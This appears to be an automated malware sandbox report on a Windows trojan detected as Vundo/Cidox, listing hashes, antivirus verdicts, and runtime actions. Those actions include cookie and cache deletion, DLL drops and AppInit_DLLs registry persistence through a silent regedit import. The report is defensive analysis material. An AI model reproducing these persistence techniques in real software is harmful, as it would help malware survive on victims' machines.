Analysis Date: 2015-01-21 21:43:52
MD5: 65470543de3449e490192c12bad9ecf9
SHA1: 00cc238e8a22ba1ead0b53a5b09cf69158d60a2f

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: b3092bbbbc1789e54ab4a958f96b32ea sha1: 35bc1238d3b62889ea79bf0a136e36d016cf3307 size: 27136
Section: .rdata md5: 4c1d41b236698b3965e7a0d564cc9f81 sha1: f80448a15196acddbb1a7b1b4dd707b392b4f2e5 size: 7168
Section: .data md5: 709ffafe4732e0260ba7e99826524d0d sha1: 31fe46801e552144211e26cdc2a5a2674bd2dce0 size: 5120
Section: .rsrc md5: cb2914af20ddc394fff115643c22f091 sha1: f7ad8276604ddd3d2d189dd5caa1df247c9b2c67 size: 138752
Timestamp: 2012-11-26 18:42:06
Packer: Microsoft Visual C++ ?.?
PEhash: 6f4555e3fc85af53ec3a7e04fcfdf75b575a4534
IMPhash: 7d0ae75d91afac4dfabb6e18247ab840
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Variant.Symmi.6801
AV Alwil (avast): Crypt-OXO [Trj]
AV Arcabit (arcavir): Gen:Variant.Symmi.6801
AV Authentium: W32/Cidox.A.gen!Eldorado
AV Avira (antivir): TR/Drop.Vundo.voua
AV BullGuard: Gen:Variant.Symmi.6801
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): Trojan.Vundo.Gen
AV ClamAV: no_virus
AV Dr. Web: Trojan.DownLoader7.31368
AV Emsisoft: Gen:Variant.Symmi.6801
AV Eset (nod32): Win32/Kryptik.APMA
AV Fortinet: W32/Kryptik.FAGX!tr
AV Frisk (f-prot): W32/Cidox.A.gen!Eldorado
AV F-Secure: Gen:Variant.Symmi.6801
AV Grisoft (avg): Win32/Cryptor
AV Ikarus: Trojan-Dropper.Win32.Vundo
AV K7: Backdoor ( 04c501871 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Trojan.Inject
AV Mcafee: RDN/Vundo!dw
AV Microsoft Security Essentials: TrojanDropper:Win32/Vundo.V
AV MicroWorld (escan): Gen:Variant.Symmi.6801
AV Rising: no_virus
AV Sophos: no_virus
AV Symantec: Trojan.Gen
AV Trend Micro: TROJ_VUNDO.SMKK
AV VirusBlokAda (vba32): Backdoor.Cidox

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

Creates File: C:\WINDOWS\system32\mucltei.dll
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Cookies\cf
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process: C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\mucltei.dll\\x00

